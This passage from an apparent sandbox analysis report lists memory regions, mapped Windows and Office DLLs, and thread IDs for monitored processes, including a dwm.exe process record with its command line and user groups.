38690 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 38691 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 38692 start_va = 0x250000 end_va = 0x250fff entry_point = 0x250000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38693 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 38694 start_va = 0x370000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38695 start_va = 0x3b0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 38696 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38697 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 38698 start_va = 0x3a0000 end_va = 0x3a8fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 38699 start_va = 0x3f0000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 38700 start_va = 0x420000 end_va = 0x428fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 38701 start_va = 0x1e10000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 38702 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38703 start_va = 0xa70000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 38704 start_va = 0x370000 end_va = 0x396fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38705 start_va = 0xb00000 end_va = 0xb39fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 38706 start_va = 0x1f10000 end_va = 0x1f69fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 38707 start_va = 0x728c0000 end_va = 0x7290bfff entry_point = 0x728c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 38708 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 38709 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38710 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38711 start_va = 0x72880000 end_va = 0x728b0fff entry_point = 0x72880000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 38712 start_va = 0x72470000 end_va = 0x7287afff entry_point = 0x72470000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 38714 start_va = 0x400000 end_va = 0x402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 38715 start_va = 0x723c0000 end_va = 0x72462fff entry_point = 0x723c0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 38716 start_va = 0x72330000 end_va = 0x723bdfff entry_point = 0x72330000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 38717 start_va = 0x72300000 end_va = 0x7232afff entry_point = 0x72300000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 38718 start_va = 0x1f70000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 38719 start_va = 0x2150000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 38720 start_va = 0x410000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 38721 start_va = 0x420000 end_va = 0x437fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 38722 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 38723 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 38724 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 38725 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 38726 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 38727 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 38728 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 38729 start_va = 0x2140000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 38730 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 38731 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 38732 start_va = 0x71ee0000 end_va = 0x722f9fff entry_point = 0x71ee0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 38733 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 38734 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 38735 start_va = 0x1fb0000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 38736 start_va = 0x71670000 end_va = 0x71ed3fff entry_point = 0x71670000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 38737 start_va = 0x1fc0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 38738 start_va = 0x1fd0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 38739 start_va = 0x1fe0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 38740 start_va = 0x71600000 end_va = 0x71669fff entry_point = 0x71600000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 38741 start_va = 0x715f0000 end_va = 0x715f8fff entry_point = 0x715f0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 38743 start_va = 0x1ff0000 end_va = 0x1ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 38744 start_va = 0x715e0000 end_va = 0x715eafff entry_point = 0x715e0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 38747 start_va = 0x71570000 end_va = 0x715dffff entry_point = 0x71570000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 38748 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 38749 start_va = 0x2060000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 38750 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38751 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38752 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38753 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38754 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38755 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38756 start_va = 0x71560000 end_va = 0x71565fff entry_point = 0x71560000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 38757 start_va = 0x20a0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 38758 start_va = 0x2000000 end_va = 0x2000fff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 38759 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 38760 start_va = 0x2350000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 38761 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38762 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38763 start_va = 0x714f0000 end_va = 0x71551fff entry_point = 0x714f0000 region_type = mapped_file name = "iedkcs32.dll" filename = "\\Windows\\System32\\iedkcs32.dll" (normalized: "c:\\windows\\system32\\iedkcs32.dll") Region: id = 38764 start_va = 0x1e10000 end_va = 0x1e22fff entry_point = 0x1e10000 region_type = mapped_file name = "iedkcs32.dll.mui" filename = "\\Windows\\System32\\en-US\\iedkcs32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iedkcs32.dll.mui") Region: id = 38765 start_va = 0x1e10000 end_va = 0x1e3dfff entry_point = 0x1e10000 region_type = mapped_file name = "ie4uinit.exe" filename = "\\Windows\\System32\\ie4uinit.exe" (normalized: "c:\\windows\\system32\\ie4uinit.exe") Region: id = 38766 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x1e40000 region_type = mapped_file name = "ie4uinit.exe.mui" filename = "\\Windows\\System32\\en-US\\ie4uinit.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ie4uinit.exe.mui") Region: id = 38768 start_va = 0x1e10000 end_va = 0x1e11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 38769 start_va = 0x1e60000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 38770 start_va = 0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38771 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38772 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38773 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38774 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38775 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38776 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38777 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38778 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38780 start_va = 0x1e20000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 38781 start_va = 0x2220000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 38782 start_va = 0x2290000 end_va = 0x22cffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 38783 start_va = 0x2340000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 38784 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 38785 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38786 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38787 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38788 start_va = 0x2560000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 38789 start_va = 0x747c0000 end_va = 0x747f7fff entry_point = 0x747c0000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 38790 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 38791 start_va = 0x1ea0000 end_va = 0x1ea1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 38792 start_va = 0x747b0000 end_va = 0x747b8fff entry_point = 0x747b0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 38793 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 38794 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38795 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38796 start_va = 0x712a0000 end_va = 0x71555fff entry_point = 0x712a0000 region_type = mapped_file name = "themeui.dll" filename = "\\Windows\\System32\\themeui.dll" (normalized: "c:\\windows\\system32\\themeui.dll") Region: id = 38798 start_va = 0x71220000 end_va = 0x71297fff entry_point = 0x71220000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 38799 start_va = 0x74030000 end_va = 0x74043fff entry_point = 0x74030000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 38800 start_va = 0x25a0000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 38801 start_va = 0x2780000 end_va = 0x30affff entry_point = 0x2780000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 38802 start_va = 0x1eb0000 end_va = 0x1eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 38803 start_va = 0x1ec0000 end_va = 0x1ec2fff entry_point = 0x1ec0000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 38804 start_va = 0x1ed0000 end_va = 0x1ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 38805 start_va = 0x25a0000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 38806 start_va = 0x2740000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 38807 start_va = 0x1ee0000 end_va = 0x1f05fff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 38808 start_va = 0x2020000 end_va = 0x2028fff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 38809 start_va = 0x30c0000 end_va = 0x30fffff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38810 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 1215 os_tid = 0x474 Thread: id = 1216 os_tid = 0x478 Thread: id = 1217 os_tid = 0x480 Thread: id = 1219 os_tid = 0x484 Thread: id = 1220 os_tid = 0x488 Thread: id = 1221 os_tid = 0x48c Thread: id = 1222 os_tid = 0x490 Thread: id = 1223 os_tid = 0x494 Thread: id = 1224 os_tid = 0x498 Process: id = "681" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x7f1d1280" os_pid = "0x4a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "674" os_parent_pid = "0x32c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38818 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38819 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38820 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 38821 start_va = 0x6e0000 end_va = 0x6f9fff entry_point = 0x6e0000 region_type = mapped_file name = "dwm.exe" filename = "\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe") Region: id = 38822 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38823 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38824 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38825 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 38826 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38830 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38831 start_va = 0x130000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 38832 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38833 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38834 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38836 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38837 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38838 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38839 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38840 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38841 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38842 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38843 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38844 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38845 start_va = 0x711f0000 end_va = 0x7120afff entry_point = 0x711f0000 region_type = mapped_file name = "dwmredir.dll" filename = "\\Windows\\System32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll") Region: id = 38853 start_va = 0x71070000 end_va = 0x711c0fff entry_point = 0x71070000 region_type = mapped_file name = "dwmcore.dll" filename = "\\Windows\\System32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll") Region: id = 38857 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 38858 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 38859 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 38860 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38861 start_va = 0x76270000 end_va = 0x763cbfff entry_point = 0x76270000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 38862 start_va = 0x71040000 end_va = 0x7106bfff entry_point = 0x71040000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 38863 start_va = 0x71000000 end_va = 0x71039fff entry_point = 0x71000000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 38866 start_va = 0x70f70000 end_va = 0x70ff2fff entry_point = 0x70f70000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Thread: id = 1228 os_tid = 0x4ac